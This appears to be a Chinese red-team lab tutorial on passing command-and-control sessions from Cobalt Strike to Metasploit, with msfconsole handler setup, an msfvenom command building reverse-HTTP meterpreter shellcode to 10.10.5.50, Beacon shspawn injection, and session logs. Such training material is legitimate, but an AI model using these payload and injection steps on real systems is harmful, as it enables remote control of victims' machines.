【C2】会话传递

一、概述

简单来说，这里的会话传递就是指不同C2之间的切换，比如把CS的上线主机转到MSF上，或者是CS的不同类型监听器之间的切换，好处有可以使用不同C2的一些特性功能，一个C2被干掉后可以使用其他C2做备用，模拟其他组织的技战法。

二、Beacon传递

CS内不同监听器之间切换，使用spawn命令可以新创建一个x86或x64进程并加载监听器的shellcode

例如在bfarmer上的DNS Beacon是一分钟心跳一次，我们不想用它来执行操作，想切换成HTTP的Beacon，就可以如下操作

三、第三方C2切换

CS内置可以切换MSF的HTTP/HTTPS Payload上线，首先启动一个msfconsole开启反向HTTP的监听

attacker@ubuntu ~> sudo msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST ens5
msf6 exploit(multi/handler) > set LPORT 8080

注意：

1、必须使用分段式的reverse_http载荷

2、确保没用CS未占用的端口

msf6 exploit(multi/handler) > run[*] Started HTTP reverse handler on http://10.10.5.50:8080

进入CS的监听器管理页面，创建一个外部HTTP监听器，输入MSF配置的IP和端口

监听器激活后可以使用spawn、jump、elevate等Beacon命令，使用spawn msf命令可以创建一个新进程并注入msf监听器的shellcode，在msf上获得shell

[*] http://10.10.5.50:8080 handling request from 10.10.122.254; (UUID: t6qekc2g) Staging x86 payload (176732 bytes) ...
[*] Meterpreter session 1 opened (10.10.5.50:8080 -> 127.0.0.1) at 2022-09-05 11:29:54 +0000

meterpreter > sysinfo
Computer        : WKSTN-2
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : DEV
Logged On Users : 11
Meterpreter     : x86/windows

外部监听器的缺点：

1、仅支持x86架构（不支持x64）

2、仅支持分段式payload（不支持无阶段）

四、Spawn & Inject

‍

CS中有两个通用的注入命令用于会话传递，shinject和shspawn，可以用于注入任意shellcode，区别是shinject注入现有进程，shspawn是创建新进程

首先，设置msf载荷类型为x64的无阶段类型

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_http
msf6 exploit(multi/handler) > exploit[*] Started HTTP reverse handler on http://10.10.5.50:8080

使用msfvenom生成有效载荷shellcode

ubuntu@DESKTOP-3BSK7NO ~> msfvenom -p windows/x64/meterpreter_reverse_http LHOST=10.10.5.50 LPORT=8080 -f raw -o /mnt/c/Payloads/msf_http_x64.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 201820 bytes
Saved as: /mnt/c/Payloads/msf_http_x64.bin

使用shspawn创建新进程并注入shelcode

beacon> shspawn x64 C:\Payloads\msf_http_x64.bin[*] http://10.10.5.50:8080 handling request from 10.10.122.254; (UUID: 64tqy4zf) Redirecting stageless connection from /jeqN5SIPwEzAGcEbowwz7Q-hb8QsIP with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36'
[*] http://10.10.5.50:8080 handling request from 10.10.122.254; (UUID: 64tqy4zf) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (10.10.5.50:8080 -> 127.0.0.1) at 2022-09-05 13:04:53 +0000

MSF上线成功

​

原创 高级红队专家